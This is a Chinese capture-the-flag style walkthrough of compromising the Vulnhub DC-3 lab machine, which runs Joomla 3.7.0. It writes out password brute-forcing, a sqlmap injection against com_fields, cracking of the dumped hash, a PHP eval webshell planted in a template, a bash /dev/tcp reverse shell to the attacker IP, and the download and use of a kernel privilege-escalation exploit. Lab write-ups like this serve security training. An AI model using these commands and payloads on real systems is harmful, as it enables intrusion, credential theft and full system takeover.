Vulnhub靶机：DC-3（内核漏洞提权）

目标机：192.168.119.147

攻击机（kali）：192.168.119.140

本期涉及工具：nmap、whatweb、joomscan、burp、sqlmap、linux-exploit-suggester(les)、蚁剑

工具详情：

joomscan : https://github.com/OWASP/joomscan

les : https://github.com/mzet-/linux-exploit-suggester

首先使用nmap对目标机进行端口扫描，发现目标只开放80端口：

访问http://192.168.119.147:80，DC-3给出本次渗透目标:只有一个flag，没有任何线索。但还是给了提示：system。

目标只开放80端口，那进入系统的手段只有从该端口入手。

运用whatweb进行网站信息搜集，发现该网站是joomla CMS，但是没有版本信息：

既然知道了CMS，使用相应的扫描工具joomscan：

下载及运用：


git clone https://github.com/rezasp/joomscan.gitcd joomscanperl joomscan.pl --url 192.168.119.147

通过扫描，知道了joomla的版本为3.7.0并发现了登录界面。

进入登陆界面，尝试用burp爆破密码。用户名为admin（用户名于网站首页发现）


由于该密码为弱密码，成功爆破出admin密码snoopy


知晓账号密码还有另外一种方法：


搜索本地exploit库，发现joomla 3.7.0存在sql注入漏洞：

searchsploit joomla 3.7.0

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

这里需要用到sqlmap。事不宜迟，启动sqlmap并使用该payload验证sql注入是否存在：

sqlmap.py -u "http://192.168.119.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --batch

sql注入存在：

运用该sql注入漏洞，爆破出数据库，数据表等信息：

--dbs --batch-D joomladb --tables --batch-D joomladb -T #__users --dump

得到用户账号密码信息：

admin

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

使用john进行密码解密，得到明文密码snoopy(将密码存储在12.txt内)：

john --wordlist=/usr/share/john/password.lst 12.txt

进入系统后发现Templates处可以编辑php文件并且可以从外部访问。

Extensions->Templates->Templates

选择Bzz3

在index.php中写入一句话木马

<?php @eval($_POST['cmd']);?>

蚁剑连接：

http://192.168.119.147/templates/beez3/index.php；

成功getwebshell:

但并非root权限，需要进行提权。

在kali上用nc监听7777端口：

nc -lvp 7777

然后用蚁剑的终端操作：

bash -c 'bash -i >& /dev/tcp/192.168.119.140/7777 0>&1'

反弹shell成功：

尝试suid提权，但是没有发现常见的suid提权文件并且没有sudo权限：

尝试内核提权。

运用工具linux-exploit-suggester（简称LES）：

LES工具旨在帮助检测给定Linux内核/基于Linux的机器的安全缺陷。

将该工具下载至目标机：

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

配置文件权限：

chmod +x les.sh

运行该工具，将展示出基于本机内核版本可能存在的安全漏洞以及漏洞的详细信息链接、下载链接：

./les.sh

经过搜索，发现chocobo_root和double-fdput在本地exploit库中：

searchsploit chocobo_rootsearchsploit double-fdput

这里我们运用double-fdput漏洞，查看漏洞详情：

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

下载该漏洞镜像文件至目标机：

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

下载好后解压文件，并转换目录：

unzip 39772.zipcd 39772tar -xvf exploit.tarcd ebpf_mapfd_doubleput_exploit

执行漏洞文件，获取root权限:

./compile.sh./doubleput

转到/root目录，发现flag：

渗透结束，任务完成。

本次渗透关键点在于引入了自动检测内核漏洞脚本（les）。其次，在成功进入网站后，我们应该去寻找可用的上传点或者能够直接写入代码的功能点，当然排查功能点的耐心也十分重要。

原文始发于微信公众号（陆吾安全攻防实验室）：Vulnhub靶机：DC-3（内核漏洞提权）